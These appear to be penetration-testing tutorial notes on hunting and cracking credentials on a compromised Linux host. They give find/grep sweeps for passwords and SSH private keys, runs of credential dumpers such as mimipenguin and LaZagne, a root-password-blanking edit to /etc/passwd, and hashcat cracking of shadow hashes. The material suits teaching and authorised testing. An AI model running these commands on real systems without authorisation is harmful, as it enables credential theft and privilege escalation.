Linux Local Password Attacks

Credential Hunting in Linux

Hunting for credentials is one of the first steps once we have access to the system. These low-hanging fruits can give us elevated privileges within seconds or minutes. Among other things, this is part of the local privilege escalation process that we will cover here. However, it is important to note here that we are far from covering all possible situations and therefore focus on the different approaches.

Common sources of credentials:

Files

We should look for, find, and inspect several categories of files one by one. These categories are the following:

There are many methods to find these configuration files, and with the following method, we will see we have reduced our search to these three file extensions.

for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done

In this example, we search for three words (user, password, pass) in each file with the file extension .cnf.

for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\|lib");do echo -e "\nFile: " $i; grep "user\|password\|pass" $i 2>/dev/null | grep -v "\#";done

We can apply this simple search to the other file extensions as well. Additionally, we can apply this search type to databases stored in files with different file extensions, and we can then read those.

for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man";done

Sometimes there's notes taken by the administrators or users in generic files with arbitrary extensions, commonly .txt or no extension at all

find /home/* -type f -name "*.txt" -o ! -name "*.*"

Scripts are files that often contain highly sensitive information and processes. Among other things, these also contain credentials that are necessary to be able to call up and execute the processes automatically. Otherwise, the administrator or developer would have to enter the corresponding password each time the script or the compiled program is called.

for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share";done

Cronjobs

cat /etc/crontab
ls -la /etc/cron.*/

SSH Keys

Private keys

grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"

Public keys

grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1"

History

In the history of the commands entered on Linux distributions that use Bash as a standard shell, we find the associated files in .bash_history. Nevertheless, other files like .bashrc or .bash_profile can contain important information.

tail -n5 /home/*/.bash*

Logs

SOME checks on those files:

for i in $(ls /var/log/* 2>/dev/null);do GREP=$(grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null); if [[ $GREP ]];then echo -e "\n#### Log file: " $i; grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null;fi;done

Memory and Cache

Many applications and processes work with credentials needed for authentication and store them either in memory or in files so that they can be reused.

sudo python3 mimipenguin.py
sudo bash mimipenguin.sh

This tool allows us to access far more resources and extract the credentials. The passwords and hashes we can obtain come from the following sources but are not limited to:

sudo python2.7 laZagne.py all

Browsers

Browsers store the passwords saved by the user in an encrypted form locally on the system to be reused. For example, the Mozilla Firefox browser stores the credentials encrypted in a hidden folder for the respective user. These often include the associated field names, URLs, and other valuable information.

python3.9 firefox_decrypt.py

Alternatively, LaZagne can also return results if the user has used the supported browser.

python3 laZagne.py browsers

Passwd, Shadow & Opasswd

The standard files that are read, managed, and updated are /etc/passwd and /etc/shadow. PAM also has many other service modules, such as LDAP, mount, or Kerberos.

/etc/passwd

It can also be that the /etc/passwd file is writeable by mistake. This would allow us to clear this field for the user root so that the password info field is empty. This will cause the system not to send a password prompt when a user tries to log in as root.

root:x:0:0:root:/root:/bin/bash

# INTO

root::0:0:root:/root:/bin/bash

/etc/shadow

If the password field contains a character, such as ! or *, the user cannot log in with a Unix password. However, other authentication methods for logging in, such as Kerberos or key-based authentication, can still be used.

The same case applies if the encrypted password field is empty. This means that no password is required for the login.

However, it can lead to specific programs denying access to functions. The encrypted password also has a particular format by which we can also find out some information:

• $<type>$<salt>$<hashed>

As we can see here, the encrypted passwords are divided into three parts. The types of encryption allow us to distinguish between the following:

Algorithm Types

• $1$ – MD5

• $2a$ – Blowfish

• $2y$ – Eksblowfish

• $5$ – SHA-256

• $6$ – SHA-512

Opasswd

The PAM library (pam_unix.so) can prevent reusing old passwords. The file where old passwords are stored is the /etc/security/opasswd.

Administrator/root permissions are also required to read the file if the permissions for this file have not been changed manually.

Cracking Linux Credentials

unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes

hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked

or to crack md5 hashes (just the hashes in a list):

hashcat -m 500 -a 0 md5-hashes.list rockyou.txt